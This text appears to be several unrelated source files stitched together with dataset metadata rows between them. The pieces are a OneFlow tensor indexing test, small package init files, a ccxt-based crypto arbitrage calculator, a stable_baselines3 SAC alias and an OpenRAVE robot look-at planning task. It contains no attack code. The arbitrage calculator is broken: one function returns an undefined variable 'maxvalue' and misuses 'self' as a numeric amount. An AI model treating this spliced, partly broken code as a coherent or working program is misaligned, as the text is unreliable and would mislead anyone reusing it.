        numpy_x = np.arange(0, 27, 1).reshape(3, 3, 3)
        x = flow.tensor(numpy_x)
        test_case.assertTrue(
            np.allclose(
                numpy_x[[False, True, False], 1], x[[False, True, False], 1].numpy()
            )
        )
        test_case.assertTrue(
            np.allclose(
                numpy_x[[False, True, False], [True, False, False]],
                x[[False, True, False], [True, False, False]].numpy(),
            )
        )

    def test_mask_setitem(test_case):
        numpy_x = np.arange(0, 60, 1).reshape([3, 4, 5]).astype(np.float32)
        _test_mask_setitem(test_case, numpy_x)
        numpy_x = np.arange(0, 360, 1).reshape([3, 4, 5, 6]).astype(np.float32)
        _test_mask_setitem(test_case, numpy_x)
        numpy_x = np.arange(0, 720, 1).reshape([8, 9, 10]).astype(np.float32)
        _test_mask_setitem(test_case, numpy_x)

    def test_advanced_indexing_with_scalar_index(test_case):
        # Assigning through a 0-dim tensor index must write the element.
        index = flow.tensor([0, 2])
        x = flow.randn(5)
        x[index[0]] = 1
        test_case.assertTrue(np.allclose(x[0].numpy(), 1))

    def test_list_indexing_using_scalar_tensor(test_case):
        # Fan the helper out over every supported integer dtype.
        arg_dict = OrderedDict()
        arg_dict["function_test"] = [
            _test_list_indexing_using_scalar_tensor,
        ]
        arg_dict["dtype"] = [flow.uint8, flow.int8, flow.int32, flow.int64]
        for arg in GenArgList(arg_dict):
            arg[0](test_case, *arg[1:])

    # NOTE(review): the two @autotest tests below use the automated test
    # framework's torch-proxy objects; their return value is what gets
    # compared between frameworks.
    @autotest(n=3, auto_backward=False)
    def test_advanced_indexing_with_0_size_tensor(test_case):
        device = random_device()
        data = torch.arange(8).reshape(2, 2, 2).to(device)
        ranges = []
        ranges.append(torch.ones(0, 1).to(torch.int64))
        ranges.append(torch.zeros(1, 3).to(torch.int64))
        res = data[ranges]
        return res

    @autotest(n=1)
    def test_dataloader_indexing_with_1_dim_tensor(test_case):
        device = random_device()
        x = random_tensor(ndim=1, dim0=512).to(device)
        batch_data = list()
        for i in range(512):
            batch_data.append(x[i])
        return torch.stack(batch_data)

    @unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
    def test_indecies_on_different_devices(test_case):
        # Index tensors living on a different device than the data tensor.
        x = flow.ones(3, 10)
        y = flow.ones(3, 10, device=flow.device("cuda:0"))
        x_idx = [flow.tensor([1, 2]), flow.tensor([2, 0], device=flow.device("cuda:0"))]
        y_idx = [flow.tensor([1, 2], device=flow.device("cuda:0")), flow.tensor([2, 0])]
        test_case.assertTrue(np.allclose(x[x_idx].numpy(), np.array([1, 1])))
        test_case.assertTrue(np.allclose(y[y_idx].numpy(), np.array([1, 1])))
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
class TestTensorIndexingMultiGpu(flow.unittest.TestCase):
    """Indexing test that requires two CUDA devices (1 node, 2 devices)."""

    @flow.unittest.skip_unless_1n2d()
    def test_indecies_on_different_devices(test_case):
        # Data on cuda:0, one index tensor on cuda:1, one on CPU.
        x = flow.ones(3, 10, device=flow.device("cuda:0"))
        idx = [flow.tensor([1, 2], device=flow.device("cuda:1")), flow.tensor([2, 0])]
        test_case.assertTrue(np.allclose(x[idx].numpy(), np.array([1, 1])))
# Allow running this test module directly with `python <file>`.
if __name__ == "__main__":
    unittest.main()
| 38.328947
| 88
| 0.605847
| 2,685
| 17,478
| 3.736313
| 0.072253
| 0.091507
| 0.141746
| 0.157496
| 0.818282
| 0.781699
| 0.757675
| 0.74053
| 0.720594
| 0.662879
| 0
| 0.05558
| 0.215585
| 17,478
| 455
| 89
| 38.413187
| 0.676149
| 0.043941
| 0
| 0.391429
| 0
| 0
| 0.008147
| 0.002516
| 0
| 0
| 0
| 0.002198
| 0.228571
| 1
| 0.062857
| false
| 0
| 0.022857
| 0
| 0.097143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b828f504bb7218181714fcc165a33553c102dccf
| 32
|
py
|
Python
|
howcani/__init__.py
|
rahuldshetty/howcani
|
974e129c6edd97a0c234e6c2f1c4c084fecd8584
|
[
"MIT"
] | null | null | null |
howcani/__init__.py
|
rahuldshetty/howcani
|
974e129c6edd97a0c234e6c2f1c4c084fecd8584
|
[
"MIT"
] | null | null | null |
howcani/__init__.py
|
rahuldshetty/howcani
|
974e129c6edd97a0c234e6c2f1c4c084fecd8584
|
[
"MIT"
] | null | null | null |
from howcani.howcani import main
| 32
| 32
| 0.875
| 5
| 32
| 5.6
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09375
| 32
| 1
| 32
| 32
| 0.965517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b8295b666548c32b44eff3d7c4e892d875c6643a
| 94
|
py
|
Python
|
mtsoo/__init__.py
|
RunningPhoton/mfea-ii
|
9bf6520547a1c1972b62985f65a744471f1f1b00
|
[
"MIT"
] | 35
|
2019-12-11T10:23:12.000Z
|
2021-12-08T05:50:24.000Z
|
mfea_ii_lib/__init__.py
|
minhquang4334/mfeaii-ann-rl
|
d954ef4fdb3c39a4d3f3eb57d445c99bee46f7cc
|
[
"MIT"
] | null | null | null |
mfea_ii_lib/__init__.py
|
minhquang4334/mfeaii-ann-rl
|
d954ef4fdb3c39a4d3f3eb57d445c99bee46f7cc
|
[
"MIT"
] | 11
|
2019-12-11T10:57:16.000Z
|
2021-07-21T08:51:31.000Z
|
from tqdm import trange
from .tasks import *
from .operators import *
from .helpers import *
| 15.666667
| 24
| 0.755319
| 13
| 94
| 5.461538
| 0.538462
| 0.28169
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.180851
| 94
| 5
| 25
| 18.8
| 0.922078
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b8367d9ed8e98005579206f5d3420d80094a1915
| 13,637
|
py
|
Python
|
app/module/exchangess/calculation.py
|
kamijiseiya/AbidoraKun
|
20fc5dc19779b939b150c6a4ac3ac2a601ba48c8
|
[
"MIT"
] | 2
|
2018-05-02T23:46:14.000Z
|
2018-05-15T02:02:04.000Z
|
app/module/exchangess/calculation.py
|
kamijiseiya/cash-cow
|
20fc5dc19779b939b150c6a4ac3ac2a601ba48c8
|
[
"MIT"
] | 58
|
2018-05-01T05:02:18.000Z
|
2018-08-03T14:41:29.000Z
|
app/module/exchangess/calculation.py
|
kamijiseiya/cash-cow
|
20fc5dc19779b939b150c6a4ac3ac2a601ba48c8
|
[
"MIT"
] | null | null | null |
import time
import ccxt
import json
class CALCULATION:
"""取引所間の通貨差額を求めるクラス"""
def difference_xrp_btc(self):
    """Compute XRP arbitrage profits (in JPY) between bitbank, binance and coinex.

    NOTE(review): despite the name, ``self`` is used throughout as the XRP
    *amount* to trade, not as an instance — callers appear to pass a number.
    The signature is kept unchanged for compatibility.

    Returns a dict with the rounded per-route profits, the best/worst route
    keys and values, and the buy/sell prices of the best route. Retries
    every 10 seconds on exchange errors.
    """
    while True:
        try:
            bitbanks = ccxt.bitbank()
            bitbank_btc_jpy = bitbanks.fetch_ticker('BTC/JPY')
            bitbank_xrp_jpy = bitbanks.fetch_ticker('XRP/JPY')
            # XRP/BTC cross rate on bitbank, derived from the two JPY tickers.
            bitbank_xrp_btc_bid = bitbank_xrp_jpy.get("bid") / bitbank_btc_jpy.get("ask")
            bitbank_xrp_btc_ask = bitbank_xrp_jpy.get("ask") / bitbank_btc_jpy.get("bid")
            # Fetch the XRP/BTC ticker from binance.
            binances = ccxt.binance()
            binance_xrp_btc = binances.fetch_ticker('XRP/BTC')
            # Fetch the XRP/BTC ticker from coinex.
            coinex = ccxt.coinex()
            coinex_xrp_btc = coinex.fetch_ticker('XRP/BTC')
            # Profit in JPY for each buy->sell route, trading `self` XRP.
            # bitbank <-> binance
            profit_bitbank_binance = ((binance_xrp_btc.get("bid") - bitbank_xrp_btc_ask) * self) * bitbank_btc_jpy.get("bid")
            profit_binance_bitbank = ((bitbank_xrp_btc_bid - binance_xrp_btc.get("ask")) * self) * bitbank_btc_jpy.get("bid")
            # bitbank <-> coinex
            profit_bitbank_coinex = ((coinex_xrp_btc.get("bid") - bitbank_xrp_btc_ask) * self) * bitbank_btc_jpy.get("bid")
            profit_coinex_bitbank = ((bitbank_xrp_btc_bid - coinex_xrp_btc.get("ask")) * self) * bitbank_btc_jpy.get("bid")
            # binance <-> coinex
            profit_binance_coinex = ((coinex_xrp_btc.get("bid") - binance_xrp_btc.get("ask")) * self) * bitbank_btc_jpy.get("bid")
            profit_coinex_binance = ((binance_xrp_btc.get("bid") - coinex_xrp_btc.get("ask")) * self) * bitbank_btc_jpy.get("bid")
            resultsample = {'bitbank_binance': profit_bitbank_binance,
                            'binance_bitbank': profit_binance_bitbank,
                            'bitbank_coinex': profit_bitbank_coinex,
                            'coinex_bitbank': profit_coinex_bitbank,
                            'binance_coinex': profit_binance_coinex,
                            'coinex_binance': profit_coinex_binance}
            # Route keys are '<buy-exchange>_<sell-exchange>'.
            max_k = max(resultsample, key=resultsample.get)
            print(max_k)
            min_k = min(resultsample, key=resultsample.get)
            print(min_k)
            # Buy price at the exchange the best route buys from.
            if max_k.startswith('bitbank'):
                price_buy = bitbank_xrp_btc_ask
            elif max_k.startswith('binance'):
                price_buy = binance_xrp_btc.get("ask") * self
            elif max_k.startswith('coinex'):
                price_buy = coinex_xrp_btc.get("ask") * self
            else:
                price_buy = 0
            # Sale price at the exchange the best route sells to.
            if max_k.endswith('bitbank'):
                price_sale = bitbank_xrp_btc_bid
            # BUG FIX: route keys end with 'binance'; the original compared
            # against 'binans', so binance sale prices were never reported
            # (price_sale silently fell through to 0).
            elif max_k.endswith('binance'):
                price_sale = binance_xrp_btc.get("bid") * self
            elif max_k.endswith('coinex'):
                price_sale = coinex_xrp_btc.get("bid") * self
            else:
                price_sale = 0
            resultarray = {'bitbank_binance': round(profit_bitbank_binance, 3),
                           'binance_bitbank': round(profit_binance_bitbank, 3),
                           'bitbank_coinex': round(profit_bitbank_coinex, 3),
                           'coinex_bitbank': round(profit_coinex_bitbank, 3),
                           'binance_coinex': round(profit_binance_coinex, 3),
                           'coinex_binance': round(profit_coinex_binance, 3),
                           'max': max_k, 'min': min_k,
                           'maxvalue': round(maxvalue, 3), 'minvalue': round(minvalue, 3),
                           'max_buy': price_buy, 'min_sale': price_sale
                           }
            return resultarray
        except ccxt.BaseError:
            print("取引所から取引データを取得できません。")
            print("10秒待機してやり直します")
            time.sleep(10)
def difference_btc_xrp(self):
    """Compute the JPY profit of arbitraging BTC (priced in XRP) between
    bitbank, binance and coinex.

    NOTE: despite the name, ``self`` is used as a plain trade-amount
    multiplier -- the method is invoked as ``CALCULATION.difference_btc_xrp(1)``
    (unbound, with a number in the ``self`` slot). The interface is kept
    unchanged for compatibility with existing callers.

    Returns:
        dict: rounded profit for each exchange pair, the best/worst pair
        keys (``max``/``min``), their profit values (``maxvalue``/
        ``minvalue``), and the JPY prices on the buy/sell side of the
        best pair (``max_buy``/``min_sale``).

    On any ccxt exchange error the method waits 10 seconds and retries
    forever.
    """
    while True:
        try:
            # BTC/XRP rates on bitbank, derived from the BTC/JPY and
            # XRP/JPY tickers (bitbank has no direct BTC/XRP market).
            bitbanks = ccxt.bitbank()
            bitbank_btc_jpy = bitbanks.fetch_ticker('BTC/JPY')
            bitbank_xrp_jpy = bitbanks.fetch_ticker('XRP/JPY')
            bitbank_btc_xrp_bid = (1 / bitbank_xrp_jpy.get("bid")) / (1 / bitbank_btc_jpy.get("ask")) * self
            bitbank_btc_xrp_ask = (1 / bitbank_xrp_jpy.get("ask")) / (1 / bitbank_btc_jpy.get("bid")) * self
            print(bitbank_btc_xrp_ask)
            print(bitbank_btc_xrp_bid)
            # XRP/BTC ticker from binance, inverted to get BTC priced in XRP.
            binances = ccxt.binance()
            binance_xrp_btc = binances.fetch_ticker('XRP/BTC')
            print(binance_xrp_btc.get("ask"))
            binance_xrp_btc_ask = (1 / binance_xrp_btc.get("ask")) * self
            print(binance_xrp_btc.get("bid"))
            binance_xrp_btc_bid = (1 / binance_xrp_btc.get("bid")) * self
            # XRP/BTC ticker from coinex, inverted likewise.
            coinex = ccxt.coinex()
            coinex_xrp_btc = coinex.fetch_ticker('XRP/BTC')
            print(coinex_xrp_btc.get("ask"))
            coinex_xrp_btc_ask = (1 / coinex_xrp_btc.get("ask")) * self
            print(coinex_xrp_btc.get("bid"))
            coinex_xrp_btc_bid = (1 / coinex_xrp_btc.get("bid")) * self
            # Spread per direction (in XRP), converted to JPY via the
            # bitbank XRP/JPY bid. Key format: '<buy_side>_<sell_side>'.
            profit_bitbank_binance = (binance_xrp_btc_bid - bitbank_btc_xrp_ask) * bitbank_xrp_jpy.get("bid")
            profit_binance_bitbank = (bitbank_btc_xrp_bid - binance_xrp_btc_ask) * bitbank_xrp_jpy.get("bid")
            profit_bitbank_coinex = (coinex_xrp_btc_bid - bitbank_btc_xrp_ask) * bitbank_xrp_jpy.get("bid")
            profit_coinex_bitbank = (bitbank_btc_xrp_bid - coinex_xrp_btc_ask) * bitbank_xrp_jpy.get("bid")
            profit_binance_coinex = (coinex_xrp_btc_bid - binance_xrp_btc_ask) * bitbank_xrp_jpy.get("bid")
            profit_coinex_binance = (binance_xrp_btc_bid - coinex_xrp_btc_ask) * bitbank_xrp_jpy.get("bid")
            profits = {'bitbank_binance': profit_bitbank_binance,
                       'binance_bitbank': profit_binance_bitbank,
                       'bitbank_coinex': profit_bitbank_coinex,
                       'coinex_bitbank': profit_coinex_bitbank,
                       'binance_coinex': profit_binance_coinex,
                       'coinex_binance': profit_coinex_binance}
            max_k = max(profits, key=profits.get)
            print(max_k)
            min_k = min(profits, key=profits.get)
            print(min_k)
            # Price (ask) on the exchange we would buy from for the best pair.
            if max_k.startswith('bitbank'):
                price_buy = bitbank_btc_xrp_ask
            elif max_k.startswith('binance'):
                price_buy = binance_xrp_btc_ask
            elif max_k.startswith('coinex'):
                price_buy = coinex_xrp_btc_ask
            else:
                price_buy = 0
            # Price (bid) on the exchange we would sell to for the best pair.
            # (Original code glued the last elif with a line-continuation
            # backslash; rewritten as a normal branch.)
            if max_k.endswith('bitbank'):
                price_sale = bitbank_btc_xrp_bid
            elif max_k.endswith('binance'):
                price_sale = binance_xrp_btc_bid
            elif max_k.endswith('coinex'):
                price_sale = coinex_xrp_btc_bid
            else:
                price_sale = 0
            # Best / worst achievable profit (JPY) when trading BTC.
            maxvalue = max(profits.values())
            minvalue = min(profits.values())
            return {'bitbank_binance': round(profit_bitbank_binance, 3),
                    'binance_bitbank': round(profit_binance_bitbank, 3),
                    'bitbank_coinex': round(profit_bitbank_coinex, 3),
                    'coinex_bitbank': round(profit_coinex_bitbank, 3),
                    'binance_coinex': round(profit_binance_coinex, 3),
                    'coinex_binance': round(profit_coinex_binance, 3),
                    'max': max_k, 'min': min_k,
                    'maxvalue': round(maxvalue, 3), 'minvalue': round(minvalue, 3),
                    'max_buy': round(price_buy * bitbank_xrp_jpy.get("bid"), 3),
                    'min_sale': round(price_sale * bitbank_xrp_jpy.get("bid"), 3)
                    }
        except ccxt.BaseError:
            print("取引所から取引データを取得できません。")
            print("10秒待機してやり直します")
            time.sleep(10)
def difference_ltc_btc(self):
    """Compute the JPY profit of arbitraging LTC (priced in BTC) between
    bitbank and binance.

    NOTE: ``self`` is used as a plain trade-amount multiplier -- the
    method is invoked as ``CALCULATION.difference_ltc_btc(1)``. The
    interface is kept unchanged for compatibility with existing callers.

    Returns:
        dict: rounded profit for each direction, the best/worst direction
        keys and values, and the JPY prices on the buy/sell side of the
        best direction.

    On any ccxt exchange error the method waits 10 seconds and retries
    forever.
    """
    while True:
        try:
            # LTC/BTC rates on bitbank; BTC/JPY is used to convert to JPY.
            bitbanks = ccxt.bitbank()
            bitbank_btc_jpy = bitbanks.fetch_ticker('BTC/JPY')
            bitbank_ltc_btc = bitbanks.fetch_ticker('LTC/BTC')
            bitbank_ltc_btc_bid = bitbank_ltc_btc.get("bid") * self
            bitbank_ltc_btc_ask = bitbank_ltc_btc.get("ask") * self
            print(bitbank_ltc_btc_ask)
            print(bitbank_ltc_btc_bid)
            # LTC/BTC rates on binance. (Original code stored this ticker
            # in a variable misleadingly named 'binance_xrp_btc'.)
            binances = ccxt.binance()
            binance_ltc_btc = binances.fetch_ticker('LTC/BTC')
            print(binance_ltc_btc.get("ask"))
            binance_ltc_btc_ask = binance_ltc_btc.get("ask") * self
            print(binance_ltc_btc.get("bid"))
            binance_ltc_btc_bid = binance_ltc_btc.get("bid") * self
            # Spread per direction (in BTC), converted to JPY via the
            # bitbank BTC/JPY bid. Key format: '<buy_side>_<sell_side>'.
            profit_bitbank_binance = (binance_ltc_btc_bid - bitbank_ltc_btc_ask) * bitbank_btc_jpy.get("bid")
            profit_binance_bitbank = (bitbank_ltc_btc_bid - binance_ltc_btc_ask) * bitbank_btc_jpy.get("bid")
            profits = {'bitbank_binance': profit_bitbank_binance,
                       'binance_bitbank': profit_binance_bitbank}
            max_k = max(profits, key=profits.get)
            print(max_k)
            min_k = min(profits, key=profits.get)
            print(min_k)
            # JPY price paid on the buy side of the best direction.
            if max_k.startswith('bitbank'):
                price_buy = bitbank_ltc_btc_ask * bitbank_btc_jpy.get("bid")
                print(bitbank_ltc_btc_ask)
            elif max_k.startswith('binance'):
                price_buy = binance_ltc_btc_ask * bitbank_btc_jpy.get("bid")
            else:
                price_buy = 0
            # JPY price received on the sell side of the best direction.
            if max_k.endswith('bitbank'):
                price_sale = bitbank_ltc_btc_bid * bitbank_btc_jpy.get("bid")
            elif max_k.endswith('binance'):
                price_sale = binance_ltc_btc_bid * bitbank_btc_jpy.get("bid")
            else:
                price_sale = 0
            # Best / worst achievable profit (JPY) when trading LTC.
            maxvalue = max(profits.values())
            minvalue = min(profits.values())
            return {'bitbank_binance': round(profit_bitbank_binance, 3),
                    'binance_bitbank': round(profit_binance_bitbank, 3),
                    'max': max_k, 'min': min_k,
                    'maxvalue': round(maxvalue, 3), 'minvalue': round(minvalue, 3),
                    'max_buy': round(price_buy, 3), 'min_sale': round(price_sale, 3)
                    }
        except ccxt.BaseError:
            print("取引所から取引データを取得できません。")
            print("10秒待機してやり直します")
            time.sleep(10)
if __name__ == "__main__":
    # Ad-hoc smoke run: print the XRP, BTC and LTC arbitrage reports
    # for a trade amount of 1 (the number is passed in the `self` slot).
    for report in (CALCULATION.difference_xrp_btc(1),
                   CALCULATION.difference_btc_xrp(1),
                   CALCULATION.difference_ltc_btc(1)):
        print(report)
| 48.878136
| 134
| 0.537948
| 1,350
| 13,637
| 5.028148
| 0.056296
| 0.053035
| 0.047879
| 0.037714
| 0.917796
| 0.869328
| 0.830141
| 0.801267
| 0.783441
| 0.736447
| 0
| 0.006642
| 0.370683
| 13,637
| 279
| 135
| 48.878136
| 0.784316
| 0.056391
| 0
| 0.653659
| 0
| 0
| 0.075609
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014634
| false
| 0
| 0.014634
| 0
| 0.04878
| 0.126829
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b88d89dd0b57d0b362799f326dcbb0299b01488b
| 74
|
py
|
Python
|
yacht/agents/sac.py
|
IusztinPaul/yacht
|
c68ab7c66bde860bb91534c29e97772ba328adb5
|
[
"Apache-2.0"
] | 5
|
2021-09-03T10:16:50.000Z
|
2022-02-28T07:32:43.000Z
|
yacht/agents/sac.py
|
IusztinPaul/yacht
|
c68ab7c66bde860bb91534c29e97772ba328adb5
|
[
"Apache-2.0"
] | null | null | null |
yacht/agents/sac.py
|
IusztinPaul/yacht
|
c68ab7c66bde860bb91534c29e97772ba328adb5
|
[
"Apache-2.0"
] | 1
|
2022-03-05T16:06:46.000Z
|
2022-03-05T16:06:46.000Z
|
from stable_baselines3 import SAC as SB3SAC
class SAC(SB3SAC):
    """Project-level alias of Stable-Baselines3's SAC agent.

    Subclassing (instead of importing SB3's class directly at call
    sites) gives the project a stable import path and a hook for
    future customisation; no behavior is added or changed here.
    """
| 12.333333
| 43
| 0.756757
| 11
| 74
| 5
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050847
| 0.202703
| 74
| 5
| 44
| 14.8
| 0.881356
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
b8a1479d9b504f915305522fdc68c0fe51d1b1be
| 38,170
|
py
|
Python
|
scripts/tasks.py
|
dseredyn/velma_scripts
|
26691f621ba0d4f771ddca6ecce0e49e5164123f
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/tasks.py
|
dseredyn/velma_scripts
|
26691f621ba0d4f771ddca6ecce0e49e5164123f
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/tasks.py
|
dseredyn/velma_scripts
|
26691f621ba0d4f771ddca6ecce0e49e5164123f
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2015, Robot Control and Pattern Recognition Group,
# Institute of Control and Computation Engineering
# Warsaw University of Technology
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Warsaw University of Technology nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Author: Dawid Seredynski
#
import PyKDL
import numpy as np
import math
import random
import operator
from openravepy import *
import headkinematics
import velmautils
import tree
import conversions as conv
import pose_lookup_table_left as plutl
import pose_lookup_table_right as plutr
class LooAtTaskRRT:
    """RRT planning task: find a whole-body configuration from which the
    head-mounted Kinect camera has an unobstructed view of all of the
    visual target spheres.

    NOTE(review): the class name looks like a typo for "LookAtTaskRRT";
    kept unchanged because other modules may reference it by this name.
    """
    def __init__(self, openrave, args):
        # openrave: project OpenRAVE wrapper object; args: unused by this task.
        self.openrave = openrave
        # Geometry constants handed to the head kinematics solver
        # (torso rotation / lean / head and camera offsets).
        v_rot = 0.800
        v_lean = 0.375
        v_head = 0.392
        h_cam = 0.0
        v_cam = 0.225
        self.head_kin = headkinematics.HeadKinematics(v_rot, v_lean, v_head, h_cam, v_cam)
        # Rays more than this angle (30 deg, radians) off the optical axis
        # are treated as outside the Kinect field of view in checkGoal().
        self.kinect_fov = 30.0/180.0*math.pi
        # target: key pocket
        # Visual targets: (body name, sphere diameter, position in frame B).
        self.vis_targets = [
            ("vis_target_0", 0.1, PyKDL.Vector(0, -0.4, 1.0)),
            ("vis_target_1", 0.1, PyKDL.Vector(0.1, -0.4, 1.0)),
            ("vis_target_2", 0.1, PyKDL.Vector(0.1, -0.5, 1.0)),
            ("vis_target_3", 0.1, PyKDL.Vector(0, -0.5, 1.0)),
#            ("vis_target_4", 0.1, PyKDL.Vector(0.05, -0.45, 1.0)),
        ]
        # The head is aimed at the centroid of all targets.
        self.head_target_B = PyKDL.Vector()
        for target in self.vis_targets:
            self.head_target_B += target[2]
        self.head_target_B = self.head_target_B / len(self.vis_targets)
        self.vis_bodies = []
        # target: test (vertical axis at the door plane)
#        self.vis_targets = [
#            ("vis_target_0", 0.1, PyKDL.Vector(1, 0.0, 1.2)),
#            ("vis_target_1", 0.1, PyKDL.Vector(1, 0.0, 1.3)),
#            ("vis_target_2", 0.1, PyKDL.Vector(1, 0.0, 1.4)),
#            ("vis_target_3", 0.1, PyKDL.Vector(1, 0.0, 1.5)),
#            ("vis_target_4", 0.1, PyKDL.Vector(1, 0.0, 1.6)),
#        ]
        # Create one sphere body per target; the bodies are immediately
        # removed from the environment and only re-added temporarily
        # inside checkGoal() for the ray-cast test.
        for (name, diam, pos) in self.vis_targets:
            body = self.openrave.addSphere(name, diam)
            body.SetTransform(conv.KDLToOpenrave(PyKDL.Frame(pos)))
            self.vis_bodies.append( body )
            self.openrave.env.Remove( body )
        # Joints this task plans over.
        self.dof_names = [
            "head_pan_joint",
            "head_tilt_joint",
            "left_arm_0_joint",
            "left_arm_1_joint",
            "left_arm_2_joint",
            "left_arm_3_joint",
            "right_arm_0_joint",
            "right_arm_1_joint",
            "right_arm_2_joint",
            "right_arm_3_joint",
            "torso_0_joint",
        ]
        self.dof_indices = []
        self.dof_limits = []
        for joint_name in self.dof_names:
            joint = openrave.robot_rave.GetJoint(joint_name)
            self.dof_indices.append( joint.GetDOFIndex() )
            lim_lo, lim_up = joint.GetLimits()
            self.dof_limits.append( (lim_lo[0], lim_up[0]) )
        # Map joint name -> position in self.dof_names / self.dof_limits.
        self.dof_indices_map = {}
        for i in range(len(self.dof_names)):
            self.dof_indices_map[self.dof_names[i]] = i
        self.other_dof = []
    def GetOtherDofIndices(self):
        """Return the non-goal-critical DOF indices (none for this task)."""
        return self.other_dof
    def GetDofLimits(self):
        """Return the (lower, upper) limit pairs of the task joints."""
        return self.dof_limits
    def GetDofIndices(self):
        """Return the OpenRAVE DOF indices of the task joints."""
        return self.dof_indices
    def GetDofNames(self):
        """Return the names of the task joints."""
        return self.dof_names
    def getActiveDOF(self, q):
        """Extract this task's DOF values from the full configuration q."""
        q_ret = np.empty(len(self.dof_indices))
        q_ret_idx = 0
        for dof_idx in self.dof_indices:
            q_ret[q_ret_idx] = q[dof_idx]
            q_ret_idx += 1
        return q_ret
    def checkGoal(self, q):
        """Return True iff, at configuration q, rays from the camera to all
        four visual targets lie inside the camera FOV and reach the target
        spheres without being obstructed by the robot or environment."""
        self.openrave.switchCollisionModel("velmasimplified0")
        rays_hit = 0
        m_id = 0
        self.openrave.robot_rave.SetDOFValues(q, self.dof_indices)
        # Temporarily add the target spheres so the rays can collide with them.
        for body in self.vis_bodies:
            self.openrave.env.Add( body )
        T_W_C = conv.OpenraveToKDL(self.openrave.robot_rave.GetLink("head_kinect_rgb_optical_frame").GetTransform())
        T_C_W = T_W_C.Inverse()
        cam_W = T_W_C * PyKDL.Vector()
        cam_dir_W = PyKDL.Frame(T_W_C.M) * PyKDL.Vector(0,0,0.5)
        # create rays connecting the optical frame and the target objects
        for (name, diam, pos_W) in self.vis_targets:
            pos_C = T_C_W * pos_W
            dir_W = pos_W - cam_W
            # Skip targets behind / too close to the camera plane.
            if pos_C.z() < 0.1:
                continue
            # Skip targets outside the camera field of view.
            if velmautils.getAngle(PyKDL.Vector(0,0,1), pos_C) > self.kinect_fov:
                continue
            report = CollisionReport()
            ret = self.openrave.env.CheckCollision(Ray((cam_W[0], cam_W[1], cam_W[2]), (dir_W[0], dir_W[1], dir_W[2])), report)
            # The ray counts as a hit only when the first collision is with
            # one of the vis_target_* spheres (nothing occludes the target).
            if ret and report.plink1 != None and report.plink1.GetParent().GetName().find("vis_target_") == 0:
                rays_hit += 1
            else:
                pass
        for body in self.vis_bodies:
            self.openrave.env.Remove( body )
        return rays_hit == 4
